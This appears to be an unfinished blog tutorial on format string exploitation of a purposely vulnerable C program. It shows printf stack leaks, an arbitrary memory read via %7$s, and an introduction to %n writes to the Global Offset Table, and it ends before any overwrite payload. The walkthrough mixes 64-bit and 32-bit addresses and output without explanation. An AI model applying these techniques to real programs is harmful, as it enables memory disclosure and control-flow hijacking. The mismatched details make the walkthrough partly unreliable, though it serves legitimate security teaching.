Format String Exploitation 00: testGOTwrite
POST STILL UNDER CONSTRUCTION
In an effort to better understand format string exploitation, I constructed the following trivial example and decided to write a walkthrough for it.
This example is ideal for those of you who are just getting into exploitation and are wanting to see how a simple format string exploit works.
Consider the following example:
#include <stdio.h>
#include <stdlib.h>
void victory(){
printf("Somehow you've won...\n");
}
void printStuff(){
char input[100];
gets(input);
printf(input);
}
int main(){
printStuff();
exit(0);
}
If you've never abused printf()
in the way I'm about to show you, it is not immediately obvious how the above program can have its execution flow redirected with printf()
. Our first goal will be to call the victory()
function. However, generalizing the technique can lead to arbitrary code execution, like executing /bin/sh
.
Even though a buffer overflow exploit is still possible, we're assuming for the sake of example that we can't use stack-smashing.
We can compile this program using:
-> % /usr/bin/gcc -no-pie ./testGOTwrite.c -o testGotwrite
The
-no-pie
switch disables Position-Independent Executable, which is essentially ASLR applied to the text and data sections of the binary.
I've disabled this option as exploitation with these on is harder, and this seems to be the default on most linux distros (in the process of changing)
However if you'd like to make use of the sample provided exploit, you can download all the necessary files here: testGOTwrite.7z If you compile this program yourself, the provided payload most likely won't work and will have to be modified for the addresses to line up.
Now that we have the binary in hand, run it and see what happens:
-> % ./testGOTwrite
HERPDERP
HERPDERP%
-> % ./testGOTwrite
%lx.%lx.%lx.%lx.
252e786c252e786c.7fce2b371710.7fce2b36f860.b46271.
Notice on the first invocation that the input string is merely echoed back to you, while in the second examples highlighted lines, some strange numbers appear in place of the %x. The data that is being printed out is in fact register and stack data. To see what is happening in greater detail, let's fire up radare2
:
-> % r2 -d ./testGOTwrite
Process with PID 24550 started...
= attach 24550 24550
bin.baddr 0x00400000
Using 0x400000
asm.bits 64
-- Everybody hates warnings. Mr. Pancake, tear down this -Wall
[0x7fd35b9d4f30]>
After loading the binary, we use aaa
to analyze all functions:
[0x7fd35b9d4f30]> aaa
[x] Analyze all flags starting with sym. and entry0 (aa)
TODO: esil-vm not initialized
[Cannot determine xref search boundariesr references (aar)
[x] Analyze len bytes of instructions for references (aar)
[x] Analyze function calls (aac)
[x] Use -AA or aaaa to perform additional experimental analysis.
[x] Constructing a function name for fcn.* and sym.func.* functions (aan)
ptrace (PT_ATTACH): Operation not permitted
= attach 24550 24550
Followed by s
eeking to our printStuff()
function and setting a breakpoint on the printf()
function called:
[0x7fd35b9d4f30]> s sym.printStuff
[0x004006dd]> pdf
/ (fcn) sym.printStuff 80
| sym.printStuff ();
| ; var int local_70h @ rbp-0x70
| ; var int local_8h @ rbp-0x8
| ; CALL XREF from 0x00400736 (sym.main)
| 0x004006dd 55 push rbp
| 0x004006de 4889e5 mov rbp, rsp
| 0x004006e1 4883ec70 sub rsp, 0x70 ; 'p'
| 0x004006e5 64488b042528. mov rax, qword fs:[0x28] ; [0x28:8]=-1 ; '(' ; 40
| 0x004006ee 488945f8 mov qword [local_8h], rax
| 0x004006f2 31c0 xor eax, eax
| 0x004006f4 488d4590 lea rax, qword [local_70h]
| 0x004006f8 4889c7 mov rdi, rax
| 0x004006fb b800000000 mov eax, 0
| 0x00400700 e8bbfeffff call sym.imp.gets ; char*gets(char *s)
| 0x00400705 488d4590 lea rax, qword [local_70h]
| 0x00400709 4889c7 mov rdi, rax
| 0x0040070c b800000000 mov eax, 0
| 0x00400711 e89afeffff call sym.imp.printf ; int printf(const char *format)
| 0x00400716 90 nop
| 0x00400717 488b45f8 mov rax, qword [local_8h]
| 0x0040071b 644833042528. xor rax, qword fs:[0x28]
| ,=< 0x00400724 7405 je 0x40072b
| | 0x00400726 e875feffff call sym.imp.__stack_chk_fail ; void __stack_chk_fail(void)
| `-> 0x0040072b c9 leave
\ 0x0040072c c3 ret
[0x004006dd]> db 0x00400711
We're now poised to run the program, providing our input and seeing what the stack looks like just before printf()
is called:
[0x004006dd]> dc
%lx.%lx.%lx.%lx.
hit breakpoint at: 400711
[0x004006dd]> pd 8 @ 0x004006f4
| 0x004006f4 488d4590 lea rax, qword [local_70h]
| 0x004006f8 4889c7 mov rdi, rax
| 0x004006fb b800000000 mov eax, 0
| 0x00400700 e8bbfeffff call sym.imp.gets ; char*gets(char *s)
| 0x00400705 488d4590 lea rax, qword [local_70h]
| 0x00400709 4889c7 mov rdi, rax
| 0x0040070c b800000000 mov eax, 0
| ;-- rip:
| 0x00400711 b e89afeffff call sym.imp.printf ; int printf(const char *format)
After supplying the input string of %lx.%lx.%lx.%lx.
we use the pd 8 @ 0x004006f4
command to print 8 instructions from just before the gets
call to printf
. Since this is a 64 bit binary, the ABI specifies that arguments for functions are passed via the registers rdi
, rsi
, rdx
, rcx
, r8
, r9
, in that order. Additional arguments are passed via the stack as in x86-32
.
This is important to keep in mind, since we are going to be taking advantage of this property of the calling convention to interpret the printf()
output.
If we look at the disassembly above, we can see on the highlighted lines that the local stack variable labeled local_70h
(an rbp
-based variable: rbp - 0x70
) is where our string is being stored. In the source code, this is the char input[100];
variable.
Since the ABI specifies that the rdi
register is used for arg0
for function calls, it's easy to see that both gets()
and printf()
are using this variable for their first arguments. And just for completeness, here are the signatures for both these functions (from man 3 gets
and man 3 printf
respectively):
char *gets(char *s);
int printf(const char *format, ...);
Lastly, before we continue through the print in r2
, here is what the stack and registers look like:
[0x004006dd]> pxq rbp - rsp + 0x8 @ rsp
0x7ffdd9f47300 0x2e786c252e786c25 0x2e786c252e786c25 %lx.%lx.%lx.%lx.
0x7ffdd9f47310 0x0000000000000000 0x0000000000f0b5ff ................
0x7ffdd9f47320 0x00000000000000c2 0x00007ffdd9f47356 ........Vs......
0x7ffdd9f47330 0x0000000000000001 0x00007fd35b6bdd35 ........5.k[....
0x7ffdd9f47340 0x0000000000000001 0x000000000040079d ..........@.....
0x7ffdd9f47350 0x0000000000000000 0x0000000000000000 ................
0x7ffdd9f47360 0x0000000000400750 0x1644fb0214813500 P.@......5....D.
0x7ffdd9f47370 0x00007ffdd9f47380 .s......
[0x004006dd]> dr~rdi,rsi,rdx,rcx,r8,r9,rsp,rbp
rcx = 0x7fd35b9ce860
rdx = 0x7fd35b9d0710
r8 = 0x0177e271
r9 = 0x00000000
rsi = 0x252e786c252e786c
rdi = 0x7ffdd9f47300
rsp = 0x7ffdd9f47300
rbp = 0x7ffdd9f47370
If you take a look at the highlighted line above, you should notice that at the top of the stack (0x7ffdd9f47300
) we have some familiar looking output, and since this is our input
variable, the address of this stack variable should be in the rdi
register, which we can see is true from the register dump above.
The reason this works like this is printf()
maintains an internal pointer which starts 1 word after the stack pointer. Since our supplied format string was four of %x.
, the printed stack words themselves are dot-delimited, making the program output easy to read.
Note that when running a program which expects
stdin
andstdout
in radare2, it's not always possible to see the program's output on the commandline.
This is a prime reason to use stream redirection to redirect the program'sstdin
,stdout
, or both to another terminal interface. (See "Debugging a Program by Redirecting IO to Another Terminal")
Something to notice is that in the stack output printed above, we can actually see our original format string, also on the stack, starting at address 0xffed8a8c
(a pointer to which is on top of the stack). This is both interesting and important. What happens if we write enough string formatting to reach our original input string?
Observe:
-> % ./testGOTwrite
AAAA%x.%x.%x.%x.%x.%x.%x.%x.%x
AAAA1.f77848f8.f75eceb3.fff9770a.0.f7769830.41414141.252e7825.78252e78
Here we've prefixed our input string with four A
's to make it easier to see when we've reached our input string on the stack. Since the hexadecimal representation of A
is 0x41
, we can see that this is the 7th word on the stack. printf()
gives us a direct addressing notation in order to skip the first 6 words on the stack:
-> % ./testGOTwrite
AAAA%7$x
AAAA41414141
By inserting a 7$
between the %
and x
, we were able to tell printf()
we wanted to directly reference the 7th stack word to pass as an argument for the string format variable. Well, how is this useful?
Whereas many of the format specifiers for printf()
interpret the arguments as immediate values (simply printing text), there are two notable exceptions which treat the argment as a pointer: %s
and %n
.
The %s
format specifier dereferences the argument in an attempt to print the string/characters at the specified memory address. Can you see where I'm going with this?
Let's try it:
-> % ./testGOTwrite
%s
[1] 20278 segmentation fault (core dumped) ./testGOTwrite
Hmm, a SEGFAULT
. What went wrong? Well looking back at our output above, the first argument on the stack has been 0x1
, which is an unmapped memory region. So when printf()
attempts to dereference 0x1
, the program crashes. Lets try again but with a valid memory address.
Read memory primitive
We'll use rabin2 to get main
's memory address, then use echo
to write that memory address in little-endian format before our format string:
-> % rabin2 -M ./testGOTwrite
[Main]
vaddr=0x080484db paddr=0x000004db
-> % echo -e '\xdb\x84\x04\x08%7$s' | ./testGOTwrite
ۄ�L$����q�U��Q���������
j%
-> % echo -e '\xdb\x84\x04\x08%7$s' | ./testGOTwrite | xxd
00000000: db84 0408 8d4c 2404 83e4 f0ff 71fc 5589 .....L$.....q.U.
00000010: e551 83ec 04e8 c3ff ffff 83ec 0c6a .Q...........j
From the output above, we can see that the first time we try running testGOTwrite
we get a bunch of gibberish. The gibberish, when viewed through the lens of xxd
however, is revealed to be a sequence of bytes. We can see the first four bytes db84 0408
are the same as what we entered. But what about the bytes that follow? Well, since we chose main
's memory address, we should expect to see the bytecode at the start of main
. Back in radare2:
[0xf7711bd0]> s main
[0x080484db]> pd 10
;-- main:
0x080484db 8d4c2404 lea ecx, dword [esp + 4] ; 0x4 ; 4
0x080484df 83e4f0 and esp, 0xfffffff0
0x080484e2 ff71fc push dword [ecx - 4]
0x080484e5 55 push ebp
0x080484e6 89e5 mov ebp, esp
0x080484e8 51 push ecx
0x080484e9 83ec04 sub esp, 4
0x080484ec e8c3ffffff call sym.printStuff
0x080484f1 83ec0c sub esp, 0xc
0x080484f4 6a00 push 0
Lo and behold, we have hijacked printf()
to be able to read any mapped memory of the running process! Look at the middle column for the instruction bytecode, and compare them with the xxd
output above (starting after the db84 0408
with 8d4c...
). Notice that the bytes stopped only when the 00
was reached, the normal string terminator.
Now, being able to read memory is pretty great. We can use this for instance to leak data from the Global Offset Table
, which we use in the time_is
challenge solution. But for this example printf()
exploit, we only need to write data.
Enter the Drago%n
%n
As mentioned earlier, the %n
operator is similar to %s
in that it is treated as a pointer rather than an immediate value. Where it differs though is that instead of reading from the address, it writes to it.
Let that sink in.
printf()
can write data to memory.
Let's try it out. First, we'll use radare2 to look at the memory map to see what's writable:
[0x080484b4]> dm
sys 4K 0x08048000 * 0x08049000 s -r-x /testGOTwrite /testGOTwrite ; map._testGOTwrite._r_x
sys 4K 0x08049000 - 0x0804a000 s -r-- /testGOTwrite /testGOTwrite ; map._testGOTwrite._rw_
sys 4K 0x0804a000 - 0x0804b000 s -rw- /testGOTwrite /testGOTwrite ; obj._GLOBAL_OFFSET_TABLE_
sys 1.7M 0xf755a000 - 0xf7713000 s -r-x /usr/lib32/libc-2.25.so /usr/lib32/libc-2.25.so
sys 4K 0xf7713000 - 0xf7714000 s ---- /usr/lib32/libc-2.25.so /usr/lib32/libc-2.25.so
sys 8K 0xf7714000 - 0xf7716000 s -r-- /usr/lib32/libc-2.25.so /usr/lib32/libc-2.25.so
sys 4K 0xf7716000 - 0xf7717000 s -rw- /usr/lib32/libc-2.25.so /usr/lib32/libc-2.25.so ; edi
sys 12K 0xf7717000 - 0xf771a000 s -rw- unk0 unk0
sys 8K 0xf7767000 - 0xf7769000 s -rw- unk1 unk1
sys 8K 0xf7769000 - 0xf776b000 s -r-- [vvar] [vvar] ; map._vvar_._r__
sys 8K 0xf776b000 - 0xf776d000 s -r-x [vdso] [vdso] ; map._vdso_._r_x
sys 136K 0xf776d000 - 0xf778f000 s -r-x /usr/lib32/ld-2.25.so /usr/lib32/ld-2.25.so ; map._usr_lib32_ld_2.25.so._r_x
sys 4K 0xf7790000 - 0xf7791000 s -r-- /usr/lib32/ld-2.25.so /usr/lib32/ld-2.25.so ; map._usr_lib32_ld_2.25.so._rw_
sys 4K 0xf7791000 - 0xf7792000 s -rw- /usr/lib32/ld-2.25.so /usr/lib32/ld-2.25.so
sys 132K 0xff808000 - 0xff829000 s -rw- [stack] [stack] ; map._stack_._rw_
The highlighted line above shows the memory region 0x804a000
- 0x804b000
is writable. First lets look at it and see what it is:
[0x080484b4]> s 0x804a000
[0x0804a000]> pd 10
;-- section_end..got:
;-- section..got.plt:
;-- section_end.GNU_RELRO:
;-- _GLOBAL_OFFSET_TABLE_:
0x0804a000 149f adc al, 0x9f ; section 24 va=0x0804a000 pa=0x00001000 sz=32 vsz=32 rwx=--rw- .got.plt
0x0804a002 0408 add al, 8
0x0804a004 0000 add byte [eax], al
0x0804a006 0000 add byte [eax], al
0x0804a008 0000 add byte [eax], al
0x0804a00a 0000 add byte [eax], al
;-- reloc.printf_12:
0x0804a00c .dword 0x08048346 ; RELOC 32 printf
;-- reloc.gets_16:
0x0804a010 .dword 0x08048356 ; RELOC 32 gets
;-- reloc.puts_20:
0x0804a014 .dword 0x08048366 ; RELOC 32 puts
;-- reloc.exit_24:
0x0804a018 .dword 0x08048376 ; RELOC 32 exit
This here is the Global Offset Table!
Got GOT
?
GOT
?So what is this fabled Global Offset Table anyway? Well, I could go into a very lengthy and technical explanation, but this blog post goes into the nitty-gritty pretty well. If you wanted to just know at a very high level, the GOT and PLT work together to dynamically resolve shared library functions at runtime. We can illustrate this like so:
[0x0804a000]> ood
Wait event received by different pid 22602
Process with PID 23143 started...
File dbg:///testGOTwrite reopened in read-write mode
= attach 23143 23143
Assuming filepath /testGOTwrite
[0xf77c9bd0]> s 0x0804a000
[0x0804a000]> pd 11
;-- section_end..got:
;-- section..got.plt:
;-- section_end.GNU_RELRO:
;-- _GLOBAL_OFFSET_TABLE_:
0x0804a000 149f adc al, 0x9f ; section 24 va=0x0804a000 pa=0x00001000 sz=32 vsz=32 rwx=--rw- .got.plt
0x0804a002 0408 add al, 8
0x0804a004 0000 add byte [eax], al
0x0804a006 0000 add byte [eax], al
0x0804a008 0000 add byte [eax], al
0x0804a00a 0000 add byte [eax], al
;-- reloc.printf_12:
0x0804a00c .dword 0x08048346 ; RELOC 32 printf
;-- reloc.gets_16:
0x0804a010 .dword 0x08048356 ; RELOC 32 gets
;-- reloc.puts_20:
0x0804a014 .dword 0x08048366 ; RELOC 32 puts
;-- reloc.exit_24:
0x0804a018 .dword 0x08048376 ; RELOC 32 exit
;-- reloc.__libc_start_main_28:
0x0804a01c .dword 0x08048386 ; RELOC 32 __libc_start_main
The ood
command causes radare to re-open the binary, which places us even before the entry point, 0xf77c9bd0
, and definitely way before even the main()
function is called. So we see here the addresses stored for each of these imported functions start at 0x8048346
, and are separated by 16 bytes apiece. Something to notice is that these addresses fall in the .plt
section of the binary:
[0x0804a000]> iS~80483
idx=11 vaddr=0x08048308 paddr=0x00000308 sz=35 vsz=35 perm=--r-x name=.init
idx=12 vaddr=0x08048330 paddr=0x00000330 sz=96 vsz=96 perm=--r-x name=.plt
idx=13 vaddr=0x08048390 paddr=0x00000390 sz=8 vsz=8 perm=--r-x name=.plt.got
idx=14 vaddr=0x080483a0 paddr=0x000003a0 sz=450 vsz=450 perm=--r-x name=.text
Let's look at what is stored at the entry for __libc_start_main
:
[0x0804a000]> pd 2 @ 0x8048386
| 0x08048386 6820000000 push 0x20 ; 32
`=< 0x0804838b e9a0ffffff jmp 0x8048330
Hmm, so we just push 0x20
onto the stack and
POST STILL UNDER CONSTRUCTION